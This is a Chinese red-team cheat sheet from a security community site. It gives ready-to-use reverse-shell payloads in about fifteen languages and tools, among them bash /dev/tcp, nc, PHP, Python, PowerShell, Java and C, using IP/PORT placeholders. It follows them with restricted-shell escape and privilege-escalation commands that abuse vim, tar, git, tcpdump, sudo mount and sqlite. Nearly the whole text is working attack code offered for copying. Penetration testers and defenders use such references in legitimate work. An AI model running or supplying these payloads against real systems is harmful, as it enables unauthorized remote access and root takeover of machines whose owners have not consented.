网安 - 专业的网络安全产业、社区、知识平台

红队笔记专属-shell备忘录

VSole2022-04-12 16:00:58

前言

建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会!

最全。

反向shell-备忘录

通常在获得远程代码执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互,从实战的意义来讲,反弹shell是非常有必要的,以下将从不同的工具出发

nc

listen:

nc -nlvp PORT

connect:

nc -e /bin/sh IP PORT

or

nc -c sh IP PORT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f

socat

listen:

socat tcp-listen:PORT -

connect:

socat exec:/bin/sh tcp:IP:PORT

交互式版本

listen:

socat file:`tty`,raw,echo=0 tcp-listen:PORT

connect:

socat exec:/bin/sh,pty,stderr,setsid,sigint,sane tcp:IP:PORT

ncat

listen:

ncat --allow IP -vnl PORT --ssl

connect:

ncat --exec /bin/sh --ssl IP PORT

sbd

listen:

sbd -lp PORT

connect:

sbd -e /bin/sh HOST PORT

加密版版本

listen:

sbd -l -c on -k ENCRYPTION_PHRASE -p PORT

connect:

sbd -k ENCRYPTION_PHRASE -e /bin/sh HOST PORT

bash

TCP

bash -i >& /dev/tcp/IP/PORT 0>&1

or

bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'

使用工具nc udp协议:

nc -u -lvp PORT

connect:

sh -i >& /dev/udp/IP/PORT 0>&1

php

简单的php代码版本:

php -r '$sock=fsockopen("IP", PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

完整的 PHP 脚本,带有指定要连接的 IP 地址和端口的表单:

if (empty($_POST['i']) && empty($_POST['p'])) {
 echo "IP address and port not specified!";
}
else
{
 $ip = $_POST["i"];
 $port = $_POST["p"];
 $shell = 'uname -a; w; id; /bin/sh -i';
 $chunk_size = 1400;
 $write_a = null;
 $error_a = null;
 $process = null;
 $pipes = null;
 $errno = "";
 $errstr = "";
 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
 if (!$sock) {
 echo "$errstr ($errno)";
 exit(1);
 }
 $descriptorspec = array(
  0 => array("pipe", "r"),
  1 => array("pipe", "w"),
  2 => array("pipe", "w")
  );
 $process = proc_open($shell, $descriptorspec, $pipes);
 if (!is_resource($process)) {
 echo "ERROR: Can't spawn shell";
 exit(1);
 }
 stream_set_blocking($pipes[0], 0);
 stream_set_blocking($pipes[1], 0);
 stream_set_blocking($pipes[2], 0);
 stream_set_blocking($sock, 0);
 while(!feof($sock) && !feof($pipes[1])) {
 $read_a = array($sock, $pipes[1], $pipes[2]);
 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 if (in_array($sock, $read_a)) {
  $input = fread($sock, $chunk_size);
  fwrite($pipes[0], $input);
 }
 if (in_array($pipes[1], $read_a)) {
  $input = fread($pipes[1], $chunk_size);
  fwrite($sock, $input);
 }
 if (in_array($pipes[2], $read_a)) {
  $input = fread($pipes[2], $chunk_size);
  fwrite($sock, $input);
 }
 }
 fclose($sock);
 fclose($pipes[0]);
 fclose($pipes[1]);
 fclose($pipes[2]);
 proc_close($process);
}
?>

Perl

perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

python脚本版本:

#!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP", PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

或从命令行使用python -c

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP", PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

Ruby

#!/usr/bin/ruby
require 'socket';
c=TCPSocket.new('IP', PORT)
$stdin.reopen(c)
$stdout.reopen(c)
$stderr.reopen(c)
$stdin.each_line{|l|l=l.strip;next if l.length==0;(IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }

或作为单行:

ruby -rsocket -e'f=TCPSocket.open("IP", PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Golang

使用源代码创建文件,运行然后删除源文件:

package main;
import"os/exec";
import"net";
func main() { 
 c, _ := net.Dial("tcp","IP:PORT");
 cmd := exec.Command("/bin/sh");
 cmd.Stdin=c; 
 cmd.Stdout = c;
 cmd.Stderr = c;
 cmd.Run()
}

保存文件,例如test.go,构建并运行:go run test.go

或者直接命令行

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/rev.go && go run /tmp/test.go && rm /tmp/test.go

Powershell

$address = 'IP'
$port = 'PORT'
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.RedirectStandardError = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

或作为单行:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP', PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

nodejs

创建一个js文件

var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(PORT, "IP", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});

or

require("child_process").exec('bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"')

or

var x = global.process.mainModule.require
x('child_process').exec('nc IP PORT -e /bin/bash')

然后运行:

nodejs rev.js

或者直接执行命令

nodejs -e "require('child_process').exec('nc -e /bin/sh IP PORT')"

没有nc版本:

nodejs -e "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/IP/PORT 0>&1\"')"

openssl

listen:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port PORT

connect:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect IP:PORT > /tmp/s; rm /tmp/s

Awk

连接到监听器,然后关闭反向shell进入exit

awk 'BEGIN {s = "/inet/tcp/0/IP/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('IP','PORT');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Java

Linux

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;
public class Rev {
 public static void main(String[] args) {
  String host="IP";
  int port=PORT;
  String cmd="/bin/sh";
  try {
   Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 } catch (Exception e) {}
 }
}

Windows

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;
public class Rev {
 public static void main(String[] args) {
  String host="IP";
  int port=PORT;
  String cmd="cmd.exe";
  try {
   Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 } catch (Exception e) {}
 }
}

Groovy

Linux

String host="IP";
int port=PORT;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
 while(pi.available()>0)
  so.write(pi.read());
 while(pe.available()>0)
  so.write(pe.read());
 while(si.available()>0)
  po.write(si.read());
 so.flush();
 po.flush();
 Thread.sleep(50);
 try {p.exitValue();
  break;
 }
 catch (Exception e){}
};
p.destroy();
s.close();

命令行执行:

groovy -e 'String host="IP";int port=PORT;String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();'

或者去通过线程去执行:

Thread.start {
 String host="IP";
 int port=PORT;
 String cmd="/bin/bash";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
 InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
 OutputStream po=p.getOutputStream(),so=s.getOutputStream();
 while(!s.isClosed()){
  while(pi.available()>0)
   so.write(pi.read());
  while(pe.available()>0)
   so.write(pe.read());
  while(si.available()>0)
   po.write(si.read());
  so.flush();
  po.flush();
  Thread.sleep(50);
  try {
   p.exitValue();break;
 }
  catch (Exception e){}
 };
 p.destroy();
 s.close();
}

Windows

String host="IP";
int port=PORT;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
 while(pi.available()>0)
  so.write(pi.read());
 while(pe.available()>0)
  so.write(pe.read());
 while(si.available()>0)
  po.write(si.read());
 so.flush();
 po.flush();
 Thread.sleep(50);
 try {
  p.exitValue();
  break;
 }catch (Exception e){}
};
p.destroy();
s.close();

一行搞定:

groovy -e 'String host="IP";int port=PORT;String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();'

C

创建一个文件

#include 
#include 
#include 
#include 
#include 
#include 
#include 
int main(void) {
  int sockfd;
  int lportno = PORT;
  struct sockaddr_in serv_addr;
  char *const params[] = {"/bin/sh", NULL};
  char *const environ[] = {NULL};
  sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_addr.s_addr = inet_addr("IP");
  serv_addr.sin_port = htons(lportno);
  connect(sockfd, (struct sockaddr *) &serv_addr, 16);
  dup2(sockfd, 0);
  dup2(0, 1);
  dup2(0, 2);
  execve("/bin/sh", params, environ);
}

shell-逃跑指南

Vim

:sh
:!/bin/bash

rVim

rvim --cmd ":py import os;os.system('/bin/bash')"

or

:python import os; os.system("/bin/bash")

nano / pico

直接运行nano:

bashnano -s /bin/bash

在文本内容编辑:

/bin/bash

按下Ctrl-T运行拼写检查

man, less, more

!shell
!/bin/bash

Awk

awk 'BEGIN {system("/bin/sh")}'

find

find /dev/zero -exec /bin/bash \;

rbash

bash < 4.4

BASH_CMDS[poop]=/bin/bash;poop

文件读取:

$(< ../../etc/passwd)

要么

mapfile ARRAY < ../../etc/passwd ARRAY
echo $ARRAY

通过以下方式连接时不加载配置文件ssh

ssh user@IP-ADDRESS -t "bash --noprofile"

Python

python
echo os.system('/bin/bash')

MySQL client

mysql>\! bash
bash>

gdb

(gdb) ! id
(gdb) ! /bin/bash
(gdb) shell id

Netcat, ncat

nc -vlp PORT -e /bin/bash
nc HOST PORT

Nmap

nmap --script <(echo 'os.execute("/bin/sh")')

通过脚本

nmap --script /tmp/script.nse

script.nse内容为

os.execute("id")

tcpdump

cat < shell.sh
#!/bin/bash
/bin/bash
EOF
chmod +x shell.sh
sudo tcpdump -G 1 -z ./shell.sh -w 1.pcap

在读取文件时执行脚本,内容为test.sh

#!/bin/sh
id

创建test.pcap大于 1MB 的文件,运行tcpdump

tcpdump -r /tmp/test.pcap -C 1 -w /dev/null -z /tmp/test.sh

tar

tar c --checkpoint=1 --checkpoint-action=exec=bash a a.tar

zip

zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

strace

strace -o/dev/null /bin/bash

except

except spawn sh then sh

SCP

cat >/tmp/shell.sh <
/bin/bash >&2 0>&2
EOF
chmod +x shell.sh
scp -S /tmp/shell.sh x y:

ssh

ssh -o ProxyCommand=/tmp/shell.sh localhost

git

git -c core.pager=/tmp/shell.sh --paginate help

or

git commit

或使用rebase

git rebase --exec "COMMAND" master

或者:

git rebase -ix "COMMAND" master

script

script -c /bin/bash /tmp/a

mount

user@host:~$ sudo mount -o bind /bin/bash /bin/mount
user@host:~$ sudo mount
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)

mail

仅限 GNU 版本:

sudo mail --exec='!/bin/sh'

其他:

sudo -u USER mail -u USER -s xxxx aaa
~!id

sqlite

sqlite3 /dev/null '.shell /bin/sh'

通过加载扩展:

#include 
void main() 
{ 
 execl("/bin/sh", NULL);
}

编译为.so

gcc -g -fPIC -shared /tmp/shell.c -o /tmp/shell.so

sqlite在shell中加载扩展:

sqlite> .load /tmp/shell.so main

socat

socat file:/bin/sh file:sh,create,perm=4755 > /dev/null
./sh

or

socat exec:/bin/sh -

apt-get / apt / aptitude

a:

apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"

b:

sudo apt-get changelog apt
!/bin/sh

openssl

读取文件:

openssl enc -in test.txt

写文件:

LFILE=file_to_write
echo DATA | openssl enc -out "$LFILE"

或者

LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
openssl enc -in "$TF" -out "$LFILE"

Python

>>> import pty
>>> pty.spawn('/bin/bash')

or

>>> import os
>>> os.system('ls')
>>> os.system('/bin/bash')

Ruby

ruby -e 'exec "/bin/sh"'

or

irb
irb(main):001:0> exec '/bin/bash'

Perl

perl -e 'exec "/bin/sh";'

Lua

os.execute('/bin/sh')

或者

lua -e 'os.execute("/bin/sh")'
shellsocket
本作品采用《CC 协议》,转载必须注明作者和本文链接
安全研究人员发现利用 Log4j 漏洞的第二个勒索软件家族
2021-12-23 15:23:20
安全研究人员观察到名为 TellYouThePass 的勒索软件家族尝试利用最近发现的 Log4j 高危漏洞。TellYouThePass 勒索软件家族被认为年代比较悠久且基本不活跃,在广泛使用的 Log4j 日志框架发现漏洞之后,该勒索软件家族再次活跃。研究人员表示,继 Khonsari 勒索软件之后,TellYouThePass 成为第二个被观察到利用 Log4j 漏洞(被称为Log4Shel
反弹shell的N种姿势
2021-09-26 09:00:48
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
反弹Shell大全与原理
2023-04-25 10:15:00
reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。对方主机在局域网内,从外网无法直接访问。对方主机上存在WAF,对主动连接发来的请求数据检测严格,而对向外发出的请求不进行检测或检测较少。对方由于防火墙等限制,对方机器只能发送请求,不能接收请求。在渗透测试过程中,得到webshell后一般我们会反弹shell。反弹shell原理A主机开启9090端口的tcp服务
反弹Shell的多种方式及Bypass
2023-01-11 09:57:38
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。centos执行python -c 'import socket,subprocess,os;s=socket.socket;s.connect;os.dup2; os.dup2; os.dup2;p=subprocess.call;'. 这个payload是反向连接并且只支持Linux,Windows可以参考离别歌师傅的python windows正向连接后门。这样会把目标机的/bin/bash反弹给攻击机但是很多Linux的nc很多都是阉割版的,如果目标机器没有nc或者没有-e选项的话,不建议使用nc的方式.PHP攻击机监听nc -lvvp 4444. 要求目标机器有php然后执行php -r '$sock=fsockopen;exec;'. 加载64位的shellcode需要用64位的msbuildC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
内网渗透 | 全网最实用的反弹shell总结
2022-10-26 09:23:58
是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。telnet反弹nc -lvvp 444 #攻击者主机上执行监听rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p #目标主机上执行。监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。 nc反弹nc -lvvp portnc -e /bin/bash x.x.x.x port
反弹shell命令速查
2022-07-28 06:13:42
反弹shell命令速查
常用反弹shell方法总结
2022-07-13 23:00:32
常用反弹shell方法总结
反弹shell汇总
2021-07-28 10:01:11
反弹shell汇总
分析bash反弹shell的原理
2021-07-19 22:08:04
反弹shell是获取Linux交互shell的一种方法,其方法背后的原理是什么呢
Linux下几种反弹Shell方法的总结与理解
2021-12-14 06:09:28
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。
VSole
网络安全专家